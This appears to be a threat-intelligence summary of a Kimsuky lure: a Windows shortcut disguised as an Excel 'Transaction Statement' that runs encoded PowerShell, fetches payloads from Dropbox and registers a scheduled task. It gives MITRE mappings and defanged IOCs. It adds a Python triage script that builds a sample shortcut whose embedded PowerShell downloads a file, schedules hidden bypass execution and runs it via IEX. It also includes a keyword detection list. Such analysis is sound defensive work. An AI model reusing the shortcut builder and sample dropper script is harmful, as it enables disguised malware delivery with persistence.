This article discusses the North Korean Kimsuky group's malicious file 'Transaction Statement (2024, 10, 02)'. The file is a Windows shortcut (LNK) that poses as an Excel document; when opened it runs embedded PowerShell that downloads further payloads from Dropbox-hosted URLs and registers a scheduled task for persistence. The targeting appears aimed at small and medium-sized enterprises, most likely for data theft. Affected: Kimsuky, North Korean Hacking, Small and Medium Enterprises
Keypoints :
- The North Korean hacking group Kimsuky is distributing a lure named 'Transaction Statement' that is disguised as an Excel file.
- The file is actually an LNK (Windows shortcut) whose target launches encoded script actions embedded in the shortcut's own arguments.
- Base64-encoded PowerShell is used to download and execute further malicious files from remote locations (the Dropbox URLs listed under Indicators of Compromise).
- A scheduled task is registered so that the malicious scripts keep running after the initial execution, without anything visible to the user.
- Targeting appears to focus on small and medium enterprises, and possibly defense-related companies, for information theft.
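The chain described above (a shortcut posing as an Excel file, base64 PowerShell carried in its arguments, a remote download, a scheduled task) is what an analyst has to unpack when triaging such a sample. The following is an added example and not code from the original write-up: a minimal parser for the StringData section of the MS-SHLLINK format, a decoder for PowerShell's -EncodedCommand argument, and a small URL/keyword triage, run against a shortcut constructed inside the script. The sample script, the Dropbox path 'EXAMPLE', the task name and the file names are invented for the example; only the dl.dropboxusercontent.com host comes from the page's IOCs.

```python
import base64
import binascii
import ntpath
import re
import struct

# MS-SHLLINK header constants: ShellLinkHeader is fixed at 0x4C bytes, LinkFlags sits at offset 0x14.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
FLAG_HAS_IDLIST, FLAG_HAS_LINKINFO = 0x01, 0x02
FLAG_HAS_NAME, FLAG_HAS_RELPATH, FLAG_HAS_WORKDIR = 0x04, 0x08, 0x10
FLAG_HAS_ARGS, FLAG_HAS_ICON, FLAG_IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = (("name", FLAG_HAS_NAME), ("relative_path", FLAG_HAS_RELPATH),
                 ("working_dir", FLAG_HAS_WORKDIR), ("arguments", FLAG_HAS_ARGS),
                 ("icon_location", FLAG_HAS_ICON))

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a shell link, walking past IDList and LinkInfo if present."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:               # IDListSize (2 bytes) followed by the ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:             # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & FLAG_IS_UNICODE)
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        size = count * 2 if is_unicode else count
        raw = data[pos:pos + size]
        pos += size
        # ANSI shortcuts are assumed to use cp1252; adjust for the victim's code page if needed.
        fields[name] = raw.decode("utf-16-le") if is_unicode else raw.decode("cp1252")
    return fields

# Matches -e, -ec, -enc, -EncodedCommand ... but not -ep (ExecutionPolicy), whose value also looks like base64.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:n[a-z]*|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE); None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr", "iex", "invoke-expression",
              "frombase64string", "schtasks", "register-scheduledtask")

def triage_lnk(data: bytes) -> dict:
    """Summarise what a shortcut would do: target vs. icon, decoded stage, URLs and notable keywords."""
    s = parse_lnk_strings(data)
    target = s.get("relative_path", "")
    icon = s.get("icon_location", "")
    script = decode_encoded_command(s.get("arguments", ""))
    report = {
        "target": target,
        "icon": icon,
        # An icon borrowed from one program while the target runs another is the Excel-lookalike trick.
        "icon_mismatch": bool(icon) and ntpath.basename(icon).lower() != ntpath.basename(target).lower(),
        "decoded_script": script,
        "urls": [],
        "hits": [],
    }
    if script:
        lower = script.lower()
        report["urls"] = URL_RE.findall(script)
        report["hits"] = [k for k in SUSPICIOUS if re.search(r"\b" + re.escape(k) + r"\b", lower)]
    return report

# Constructed stand-in for the embedded stage: the Dropbox host matches the page's IOCs;
# the path 'EXAMPLE', the file names and the task name are invented for this example.
SAMPLE_SCRIPT = (
    "$u='https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/.pptx?dl=0';"
    "$p=\"$env:TEMP\\stage.ps1\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "schtasks /create /sc minute /mo 30 /tn 'OfficeUpdate' /tr \"powershell -w hidden -ep bypass -f $p\" /f;"
    "IEX (Get-Content $p -Raw)"
)

def build_sample_lnk(script: str) -> bytes:
    """Constructed .lnk: PowerShell target, Excel icon, script passed via -enc (no IDList/LinkInfo)."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    flags = FLAG_HAS_RELPATH | FLAG_HAS_WORKDIR | FLAG_HAS_ARGS | FLAG_HAS_ICON | FLAG_IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\0" * (LNK_HEADER_SIZE - len(header))      # attributes, timestamps etc. left zero
    strings = (
        "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "C:\\Windows\\System32",
        f"-w hidden -nop -ep bypass -enc {enc}",
        "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
    )
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body

if __name__ == "__main__":
    for key, value in triage_lnk(build_sample_lnk(SAMPLE_SCRIPT)).items():
        print(f"{key}: {value}")
```

On a real sample call `triage_lnk(open(path, "rb").read())`. The parser stops after StringData and ignores ExtraData blocks, and the keyword list is a starting point only: the decoded stage should be read in full, since download cmdlets and task registration are easily renamed or split across variables.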
MITRE Techniques :
- T1071.001: Application Layer Protocol: Web Protocols – the additional payloads are fetched over HTTPS from Dropbox-hosted URLs.
- T1204.002: User Execution: Malicious File – execution depends on the victim opening the shortcut that looks like an Excel document; no software vulnerability is exploited.
- T1036.005: Masquerading: Match Legitimate Name or Location – the LNK file masquerades as an Excel document to entice the victim to open it.
- T1059.001: Command and Scripting Interpreter: PowerShell – base64-encoded PowerShell performs the download and execution.
- T1053.005: Scheduled Task/Cron: Scheduled Task – a scheduled task is registered to keep the malicious scripts running.
Indicators of Compromise :
- MD5 cdb9a352597f10b8539d61c4b7f4d64c
- SHA-1 8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
- SHA-256 acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63
- URL hxxps://dl.dropboxusercontent.com/scl/fi/slx06ol4j(m)jqn16icggin/.pptx?rlkey=lky2lit(5)lpthkcscfnz3f91oa&st=gwpkys9h&dl=0
- URL hxxps://dl.dropboxusercontent.com/scl/fi/nanwt6elsu(x)ziz05hnlt4/cjfansgmlans1-x(.)txt?rlkey=l6gzro1r(s)wkqbk6tinxnkuyl&st=iv78c1cg&dl=0
Full Story: https://wezard4u.tistory.com/429399